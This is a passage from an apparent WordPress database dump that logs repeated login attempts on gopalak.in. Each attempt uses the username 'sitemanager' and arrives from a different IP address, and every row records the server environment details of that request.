00:00:00'),(94094,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60088\";s:11:\"REMOTE_ADDR\";s:13:\"192.64.117.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745488728.0184369;s:12:\"REQUEST_TIME\";i:1745488728;}}','192.64.117.71',0,'2025-04-24 15:28:49','1970-01-01 00:00:00'),(94095,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48514\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.61.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745489116.4343989;s:12:\"REQUEST_TIME\";i:1745489116;}}','94.23.61.165',0,'2025-04-24 15:35:18','1970-01-01 00:00:00'),(94096,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42538\";s:11:\"REMOTE_ADDR\";s:13:\"103.110.84.40\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745489496.5059991;s:12:\"REQUEST_TIME\";i:1745489496;}}','103.110.84.40',0,'2025-04-24 15:41:38','1970-01-01 00:00:00'),(94097,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53872\";s:11:\"REMOTE_ADDR\";s:15:\"162.240.153.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745489880.5839529;s:12:\"REQUEST_TIME\";i:1745489880;}}','162.240.153.241',0,'2025-04-24 15:48:02','1970-01-01 00:00:00'),(94098,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39898\";s:11:\"REMOTE_ADDR\";s:12:\"81.12.53.206\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745490263.4538021;s:12:\"REQUEST_TIME\";i:1745490263;}}','81.12.53.206',0,'2025-04-24 15:54:25','1970-01-01 00:00:00'),(94099,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37988\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745490648.3656199;s:12:\"REQUEST_TIME\";i:1745490648;}}','198.54.114.29',0,'2025-04-24 16:00:50','1970-01-01 00:00:00'),(94100,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38544\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745491038.242691;s:12:\"REQUEST_TIME\";i:1745491038;}}','91.151.95.70',0,'2025-04-24 16:07:20','1970-01-01 00:00:00'),(94101,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41122\";s:11:\"REMOTE_ADDR\";s:11:\"92.53.96.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745491422.914917;s:12:\"REQUEST_TIME\";i:1745491422;}}','92.53.96.37',0,'2025-04-24 16:13:44','1970-01-01 00:00:00'),(94102,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57772\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.98\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745491812.2722111;s:12:\"REQUEST_TIME\";i:1745491812;}}','198.54.114.98',0,'2025-04-24 16:20:14','1970-01-01 00:00:00'),(94103,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37218\";s:11:\"REMOTE_ADDR\";s:12:\"209.74.67.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745492201.4695001;s:12:\"REQUEST_TIME\";i:1745492201;}}','209.74.67.29',0,'2025-04-24 16:26:43','1970-01-01 00:00:00'),(94104,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48392\";s:11:\"REMOTE_ADDR\";s:15:\"217.182.158.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964: